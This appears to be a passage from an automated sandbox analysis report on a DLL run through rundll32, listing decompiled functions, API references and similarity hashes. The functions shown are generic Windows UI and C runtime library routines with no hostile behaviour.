                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 1bfed9c45fcc7c4252f354aa1b7bd718f75082ca3ca7a644671ccf1c6bb2871f
                                                                                                            • Instruction ID: fdd0e0ea882c3c69c4099ed456d0cfd7dce8bbf4e7d741b6fad66cb09ea4bd77
                                                                                                            • Opcode Fuzzy Hash: 1bfed9c45fcc7c4252f354aa1b7bd718f75082ca3ca7a644671ccf1c6bb2871f
                                                                                                            • Instruction Fuzzy Hash: 40F0903A2412256FD3029FA65C88D3FB6FDEFB59E6B424038FD05D6212DE209C5587A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002095F Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E1002095F(void* __ecx) {
				int _t26;
				int _t28;
				void* _t41;

				E10011BF0(0x1003a4d8, _t41);
				_push(__ecx);
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					 *(_t41 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					_push(_t41 - 0x10);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x4c)))) + 0x8c))();
					lstrcpynA( *(_t41 + 8),  *(_t41 - 0x10),  *(_t41 + 0xc));
					_t26 = lstrlenA( *(_t41 + 8));
					E100014B0( &(( *(_t41 - 0x10))[0xfffffffffffffff0]), _t41 - 0x10);
					_t28 = _t26;
				} else {
					_t28 = GetWindowTextA( *(__ecx + 0x1c),  *(_t41 + 8),  *(_t41 + 0xc));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t28;
			}






                                                                                                            0x10020964
                                                                                                            0x10020969
                                                                                                            0x10020971
                                                                                                            0x10020993
                                                                                                            0x1002099b
                                                                                                            0x100209a2
                                                                                                            0x100209a3
                                                                                                            0x100209b2
                                                                                                            0x100209bb
                                                                                                            0x100209c9
                                                                                                            0x100209ce
                                                                                                            0x10020973
                                                                                                            0x1002097c
                                                                                                            0x1002097c
                                                                                                            0x100209d4
                                                                                                            0x100209dc

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10020964
                                                                                                            • GetWindowTextA.USER32 ref: 1002097C
                                                                                                            • lstrcpynA.KERNEL32(?,?,?,?,?,1002CC3A,?,00000104,?), ref: 100209B2
                                                                                                            • lstrlenA.KERNEL32(?,?,?,1002CC3A,?,00000104,?), ref: 100209BB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prologTextWindowlstrcpynlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3022380644-0
                                                                                                            • Opcode ID: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                                                            • Instruction ID: 9a5806592f70ea17751b7fdaa6094fb832eb62a9ddc39452fd7da2019fb28030
                                                                                                            • Opcode Fuzzy Hash: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                                                            • Instruction Fuzzy Hash: 75019E36900129EFDB05DFA4CC48BAEBBB2FF48314F00C619F512AB262CB719950DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001B66F Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001B66F(void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
				void* _t12;
				void* _t18;
				intOrPtr* _t20;
				void* _t21;
				void* _t22;

				_t20 = _a4;
				_t19 = _a8;
				_t12 = E1001B64E( *_t20,  *_a8, _t20);
				_t22 = _t21 + 0xc;
				if(_t12 != 0) {
					_t3 = _t20 + 4; // 0x4
					_t18 = E1001B64E( *_t3, 1, _t3);
					_t22 = _t22 + 0xc;
					if(_t18 != 0) {
						 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
					}
				}
				_t6 = _t20 + 4; // 0x4
				if(E1001B64E( *_t6,  *((intOrPtr*)(_t19 + 4)), _t6) != 0) {
					 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
				}
				_t10 = _t20 + 8; // 0x8
				return E1001B64E( *_t10,  *((intOrPtr*)(_t19 + 8)), _t10);
			}








                                                                                                            0x1001b670
                                                                                                            0x1001b675
                                                                                                            0x1001b67e
                                                                                                            0x1001b683
                                                                                                            0x1001b688
                                                                                                            0x1001b68a
                                                                                                            0x1001b692
                                                                                                            0x1001b697
                                                                                                            0x1001b69c
                                                                                                            0x1001b69e
                                                                                                            0x1001b69e
                                                                                                            0x1001b69c
                                                                                                            0x1001b6a1
                                                                                                            0x1001b6b4
                                                                                                            0x1001b6b6
                                                                                                            0x1001b6b6
                                                                                                            0x1001b6b9
                                                                                                            0x1001b6cc

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ___addl
                                                                                                            • String ID:
                                                                                                            • API String ID: 2260456530-0
                                                                                                            • Opcode ID: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                                                            • Instruction ID: 1cba6355bd62d8335d9ad848ad702df172e9c7a68b0d5ea6ff045fc298979a71
                                                                                                            • Opcode Fuzzy Hash: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                                                            • Instruction Fuzzy Hash: 37F06D7A800A02EFDA548B52DC02EA6B7E9FF65240B004425FD598A031EB32E8A9CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10029B23 Relevance: 6.0, APIs: 4, Instructions: 33stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10029B23(void* __esi, struct HWND__* _a4, CHAR* _a8) {
				intOrPtr _v8;
				char _v264;
				intOrPtr _t10;
				int _t20;

				_t10 =  *0x1004c470; // 0x6edecb8c
				_v8 = _t10;
				_t20 = lstrlenA(_a8);
				if(_t20 > 0x100 || GetWindowTextA(_a4,  &_v264, 0x100) != _t20 || lstrcmpA( &_v264, _a8) != 0) {
					_t13 = SetWindowTextA(_a4, _a8);
				}
				return E100117AE(_t13, _v8);
			}







                                                                                                            0x10029b2c
                                                                                                            0x10029b35
                                                                                                            0x10029b3e
                                                                                                            0x10029b47
                                                                                                            0x10029b78
                                                                                                            0x10029b78
                                                                                                            0x10029b88

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: TextWindow$lstrcmplstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 330964273-0
                                                                                                            • Opcode ID: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                                                            • Instruction ID: 93620f556a2fd5ec9caf7d88bc5fd11bb860ddfd3ca1ea698490334ddcd31a8c
                                                                                                            • Opcode Fuzzy Hash: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                                                            • Instruction Fuzzy Hash: 42F04F7690002CAFDF129FA0DD84DDDBBB9EB04380F008111F946DA120D730DE908B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100308EB Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100308EB(void* __ecx, void* __eflags) {
				signed int _t8;
				int _t9;
				void* _t11;
				void* _t12;
				signed int* _t13;
				void* _t14;

				_t12 = __ecx;
				E10030582(__ecx, __eflags, 1);
				ReleaseCapture();
				_t11 = E100220EE(_t14, GetDesktopWindow());
				LockWindowUpdate(0);
				_t13 = _t12 + 0x84;
				_t8 =  *_t13;
				if(_t8 != 0) {
					_t9 = ReleaseDC( *(_t11 + 0x1c),  *(_t8 + 4));
					 *_t13 =  *_t13 & 0x00000000;
					return _t9;
				}
				return _t8;
			}









                                                                                                            0x100308ef
                                                                                                            0x100308f1
                                                                                                            0x100308f6
                                                                                                            0x1003090a
                                                                                                            0x1003090c
                                                                                                            0x10030912
                                                                                                            0x10030918
                                                                                                            0x1003091c
                                                                                                            0x10030924
                                                                                                            0x1003092a
                                                                                                            0x00000000
                                                                                                            0x1003092a
                                                                                                            0x1003092f

                                                                                                            APIs
                                                                                                              • Part of subcall function 10030582: GetStockObject.GDI32(00000000), ref: 10030598
                                                                                                              • Part of subcall function 10030582: InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                                                            • ReleaseCapture.USER32(?,?,1003093E), ref: 100308F6
                                                                                                            • GetDesktopWindow.USER32 ref: 100308FC
                                                                                                            • LockWindowUpdate.USER32(00000000,00000000,?,?,1003093E), ref: 1003090C
                                                                                                            • ReleaseDC.USER32 ref: 10030924
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1260764132-0
                                                                                                            • Opcode ID: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                                                            • Instruction ID: cc833fa3e0bd0d4d25e579e7f05375a90551c712b7101b0f89079a167d1ea1eb
                                                                                                            • Opcode Fuzzy Hash: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                                                            • Instruction Fuzzy Hash: F2E04837500224AFE7225F65DD5DF457A64EF40752F158424F541DE0A3CA75D8D1CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100128A7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 65%
                                                                                                            			E100128A7(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v21;
				signed char _v22;
				struct _cpinfo _v28;
				char _v284;
				char _v540;
				char _v796;
				char _v1308;
				void* __ebp;
				intOrPtr _t42;
				signed int _t45;
				char _t47;
				signed char _t48;
				signed int _t58;
				signed int _t59;
				signed int _t65;
				signed int _t68;
				signed char _t70;
				char _t71;
				signed int _t73;
				signed int _t74;
				signed char* _t78;
				signed char* _t79;
				void* _t81;
				void* _t86;
				void* _t87;

				_t80 = __edi;
				_t63 = __ebx;
				_t42 =  *0x1004c470; // 0x6edecb8c
				_v8 = _t42;
				if(GetCPInfo( *0x10050b84,  &_v28) != 1) {
					_t45 = 0;
					__eflags = 0;
					do {
						__eflags = _t45 - 0x41;
						if(_t45 < 0x41) {
							L23:
							__eflags = _t45 - 0x61;
							if(_t45 < 0x61) {
								L26:
								 *(_t45 + 0x10050ba0) = 0;
							} else {
								__eflags = _t45 - 0x7a;
								if(_t45 > 0x7a) {
									goto L26;
								} else {
									 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000020;
									_t68 = _t45 - 0x20;
									goto L22;
								}
							}
						} else {
							__eflags = _t45 - 0x5a;
							if(_t45 > 0x5a) {
								goto L23;
							} else {
								 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000010;
								_t68 = _t45 + 0x20;
								__eflags = _t68;
								L22:
								 *(_t45 + 0x10050ba0) = _t68;
							}
						}
						_t45 = _t45 + 1;
						__eflags = _t45 - 0x100;
					} while (_t45 < 0x100);
				} else {
					_t47 = 0;
					do {
						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
						_t47 = _t47 + 1;
					} while (_t47 < 0x100);
					_t48 = _v22;
					_v284 = 0x20;
					if(_t48 != 0) {
						_push(__ebx);
						_t78 =  &_v21;
						_push(__edi);
						do {
							_t65 =  *_t78 & 0x000000ff;
							_t59 = _t48 & 0x000000ff;
							if(_t59 <= _t65) {
								_t73 = _t65 - _t59 + 1;
								_t74 = _t73 >> 2;
								_t81 = _t86 + _t59 - 0x118;
								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
								_t87 = _t87 + 0x18;
								_t65 = 0;
							}
							_t79 =  &(_t78[1]);
							_t48 =  *_t79;
							_t78 =  &(_t79[1]);
							_t96 = _t48;
						} while (_t48 != 0);
						_pop(_t80);
						_pop(_t63);
					}
					_push(0);
					_push( *0x10050a68);
					_push( *0x10050b84);
					_push( &_v1308);
					_push(0x100);
					_push( &_v284);
					_push(1);
					E1001843D(_t63, _t65, _t80, 0x100, _t96);
					_push(0);
					_push( *0x10050b84);
					_push(0x100);
					_push( &_v540);
					_push(0x100);
					_push( &_v284);
					_push(0x100);
					_push( *0x10050a68);
					E10018081(_t63, _t80, 0x100, _t96);
					_push(0);
					_push( *0x10050b84);
					_push(0x100);
					_push( &_v796);
					_push(0x100);
					_push( &_v284);
					_push(0x200);
					_push( *0x10050a68);
					E10018081(_t63, _t80, 0x100, _t96);
					_t58 = 0;
					do {
						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
						if((_t70 & 0x00000001) == 0) {
							__eflags = _t70 & 0x00000002;
							if((_t70 & 0x00000002) == 0) {
								 *((char*)(_t58 + 0x10050ba0)) = 0;
							} else {
								 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000020;
								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
								goto L12;
							}
						} else {
							 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000010;
							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
							L12:
							 *((char*)(_t58 + 0x10050ba0)) = _t71;
						}
						_t58 = _t58 + 1;
					} while (_t58 < 0x100);
				}
				return E100117AE(_t45, _v8);
			}





























                                                                                                            0x100128a7
                                                                                                            0x100128a7
                                                                                                            0x100128b0
                                                                                                            0x100128b5
                                                                                                            0x100128d1
                                                                                                            0x100129e4
                                                                                                            0x100129e4
                                                                                                            0x100129e6
                                                                                                            0x100129e6
                                                                                                            0x100129e9
                                                                                                            0x10012a04
                                                                                                            0x10012a04
                                                                                                            0x10012a07
                                                                                                            0x10012a1c
                                                                                                            0x10012a1c
                                                                                                            0x10012a09
                                                                                                            0x10012a09
                                                                                                            0x10012a0c
                                                                                                            0x00000000
                                                                                                            0x10012a0e
                                                                                                            0x10012a0e
                                                                                                            0x10012a17
                                                                                                            0x00000000
                                                                                                            0x10012a17
                                                                                                            0x10012a0c
                                                                                                            0x100129eb
                                                                                                            0x100129eb
                                                                                                            0x100129ee
                                                                                                            0x00000000
                                                                                                            0x100129f0
                                                                                                            0x100129f0
                                                                                                            0x100129f9
                                                                                                            0x100129f9
                                                                                                            0x100129fc
                                                                                                            0x100129fc
                                                                                                            0x100129fc
                                                                                                            0x100129ee
                                                                                                            0x10012a23
                                                                                                            0x10012a24
                                                                                                            0x10012a24
                                                                                                            0x100128d7
                                                                                                            0x100128d7
                                                                                                            0x100128d9
                                                                                                            0x100128d9
                                                                                                            0x100128e0
                                                                                                            0x100128e1
                                                                                                            0x100128e5
                                                                                                            0x100128ea
                                                                                                            0x100128f1
                                                                                                            0x100128f3
                                                                                                            0x100128f4
                                                                                                            0x100128f7
                                                                                                            0x100128f8
                                                                                                            0x100128f8
                                                                                                            0x100128fb
                                                                                                            0x10012900
                                                                                                            0x10012904
                                                                                                            0x10012907
                                                                                                            0x1001290a
                                                                                                            0x1001291d
                                                                                                            0x1001291d
                                                                                                            0x1001291d
                                                                                                            0x1001291d
                                                                                                            0x1001291f
                                                                                                            0x10012920
                                                                                                            0x10012922
                                                                                                            0x10012923
                                                                                                            0x10012923
                                                                                                            0x10012927
                                                                                                            0x10012928
                                                                                                            0x10012928
                                                                                                            0x10012929
                                                                                                            0x1001292b
                                                                                                            0x10012937
                                                                                                            0x1001293d
                                                                                                            0x1001293e
                                                                                                            0x10012945
                                                                                                            0x10012946
                                                                                                            0x10012948
                                                                                                            0x1001294d
                                                                                                            0x1001294f
                                                                                                            0x1001295b
                                                                                                            0x1001295c
                                                                                                            0x1001295d
                                                                                                            0x10012964
                                                                                                            0x10012965
                                                                                                            0x10012966
                                                                                                            0x1001296c
                                                                                                            0x10012971
                                                                                                            0x10012973
                                                                                                            0x1001297f
                                                                                                            0x10012980
                                                                                                            0x10012981
                                                                                                            0x10012988
                                                                                                            0x10012989
                                                                                                            0x1001298e
                                                                                                            0x10012994
                                                                                                            0x1001299c
                                                                                                            0x1001299e
                                                                                                            0x1001299e
                                                                                                            0x100129a9
                                                                                                            0x100129c1
                                                                                                            0x100129c4
                                                                                                            0x100129d6
                                                                                                            0x100129c6
                                                                                                            0x100129c6
                                                                                                            0x100129cd
                                                                                                            0x00000000
                                                                                                            0x100129cd
                                                                                                            0x100129ab
                                                                                                            0x100129ab
                                                                                                            0x100129b2
                                                                                                            0x100129b9
                                                                                                            0x100129b9
                                                                                                            0x100129b9
                                                                                                            0x100129dd
                                                                                                            0x100129de
                                                                                                            0x100129e2
                                                                                                            0x10012a32

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Info
                                                                                                            • String ID: $
                                                                                                            • API String ID: 1807457897-3032137957
                                                                                                            • Opcode ID: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                                                            • Instruction ID: 0aa4f3d34f00a4262c94cc47b2ead2c87a4a0533aa2425fc92cd258cd4020972
                                                                                                            • Opcode Fuzzy Hash: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                                                            • Instruction Fuzzy Hash: 304106B15043AC9FEB55CA68CC95BEE7BA8EF05304F2044E1E981DB162C7708AD5D791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10021810 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E10021810(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebx;
				void* __ebp;
				void* _t25;
				intOrPtr _t37;
				void* _t38;
				struct HINSTANCE__* _t41;
				CHAR* _t43;

				_t38 = __ecx;
				_t43 = E100373A5() + 0x7c;
				_t25 = E100373B5();
				_t37 = _a8;
				_t41 =  *(_t25 + 8);
				if(_t37 != 0 || _a12 != _t37) {
					L4:
					_push(_a16);
					_push(_a12);
					_push(_t37);
					_push(_a4);
					E10012068(_t37, _t38, __eflags, _t43, "Afx:%p:%x:%p:%p:%p", _t41);
					goto L5;
				} else {
					_t49 = _a16 - _t37;
					if(_a16 != _t37) {
						goto L4;
					}
					_push(_a4);
					E10012068(_t37, _t38, _t49, _t43, "Afx:%p:%x", _t41);
					L5:
					if(GetClassInfoA(_t41, _t43,  &_v44) == 0) {
						_v44.style = _a4;
						_v44.lpfnWndProc = DefWindowProcA;
						_v44.cbWndExtra = 0;
						_v44.cbClsExtra = 0;
						_v44.lpszMenuName = 0;
						_v44.hIcon = _a16;
						_t40 = _a12;
						_push( &_v44);
						_v44.hInstance = _t41;
						_v44.hCursor = _t37;
						_v44.hbrBackground = _a12;
						_v44.lpszClassName = _t43;
						if(E10020B9B() == 0) {
							E10028C0C(_t40);
						}
					}
					return _t43;
				}
			}











                                                                                                            0x10021810
                                                                                                            0x10021820
                                                                                                            0x10021823
                                                                                                            0x10021828
                                                                                                            0x1002182d
                                                                                                            0x10021830
                                                                                                            0x10021850
                                                                                                            0x10021850
                                                                                                            0x10021853
                                                                                                            0x10021856
                                                                                                            0x10021857
                                                                                                            0x10021861
                                                                                                            0x00000000
                                                                                                            0x10021837
                                                                                                            0x10021837
                                                                                                            0x1002183a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002183c
                                                                                                            0x10021846
                                                                                                            0x10021869
                                                                                                            0x10021877
                                                                                                            0x1002187f
                                                                                                            0x10021887
                                                                                                            0x1002188c
                                                                                                            0x1002188f
                                                                                                            0x10021892
                                                                                                            0x10021895
                                                                                                            0x10021898
                                                                                                            0x1002189e
                                                                                                            0x1002189f
                                                                                                            0x100218a2
                                                                                                            0x100218a5
                                                                                                            0x100218a8
                                                                                                            0x100218b2
                                                                                                            0x100218b4
                                                                                                            0x100218b4
                                                                                                            0x100218b2
                                                                                                            0x100218bf
                                                                                                            0x100218bf

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassInfo
                                                                                                            • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                                                            • API String ID: 3534257612-2801496823
                                                                                                            • Opcode ID: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
                                                                                                            • Instruction ID: 52b857fe777198d334fd01ba6041a527614e5ef36dd32a96c670ed063e64d698
                                                                                                            • Opcode Fuzzy Hash: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
                                                                                                            • Instruction Fuzzy Hash: 77214DB5D00259AFDB01DFA5D8819DEBBF8FF58290F41402AF908E7201E7309A50CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100165C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E100165C9() {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* __esi;
				CHAR* _t10;
				signed int _t16;
				signed int _t22;
				CHAR* _t25;
				signed int _t34;
				intOrPtr _t45;

				_push(_t27);
				_t45 =  *0x10050cac; // 0x1
				if(_t45 == 0) {
					E10012D82();
				}
				 *0x1004f6fc = 0;
				GetModuleFileNameA(0, 0x1004f5f8, 0x104);
				_t10 =  *0x10050cb0; // 0x30e3538
				 *0x1004f410 = 0x1004f5f8;
				if(_t10 == 0) {
					L4:
					_t25 = 0x1004f5f8;
				} else {
					_t25 = _t10;
					if( *_t10 == 0) {
						goto L4;
					}
				}
				E1001645D(_t25, 0,  &_v12, 0,  &_v8);
				_t40 = _v8 << 2;
				_t16 = E100107B6(_v12 + (_v8 << 2));
				_t34 = _t16;
				if(_t34 != 0) {
					E1001645D(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
					 *0x1004f3f4 = _v8 - 1;
					 *0x1004f3f8 = _t34;
					_t22 = 0;
				} else {
					_t22 = _t16 | 0xffffffff;
				}
				return _t22;
			}













                                                                                                            0x100165cd
                                                                                                            0x100165d3
                                                                                                            0x100165d9
                                                                                                            0x100165db
                                                                                                            0x100165db
                                                                                                            0x100165ec
                                                                                                            0x100165f3
                                                                                                            0x100165f9
                                                                                                            0x10016600
                                                                                                            0x10016606
                                                                                                            0x1001660f
                                                                                                            0x1001660f
                                                                                                            0x10016608
                                                                                                            0x1001660b
                                                                                                            0x1001660d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001660d
                                                                                                            0x1001661d
                                                                                                            0x10016628
                                                                                                            0x1001662e
                                                                                                            0x10016633
                                                                                                            0x1001663a
                                                                                                            0x1001664e
                                                                                                            0x10016658
                                                                                                            0x1001665e
                                                                                                            0x10016664
                                                                                                            0x1001663c
                                                                                                            0x1001663c
                                                                                                            0x1001663c
                                                                                                            0x1001666a

                                                                                                            APIs
                                                                                                            • ___initmbctable.LIBCMT ref: 100165DB
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104,00000000,?,?,?,?,?,1001125B,?,?,?,10011379,?,?), ref: 100165F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
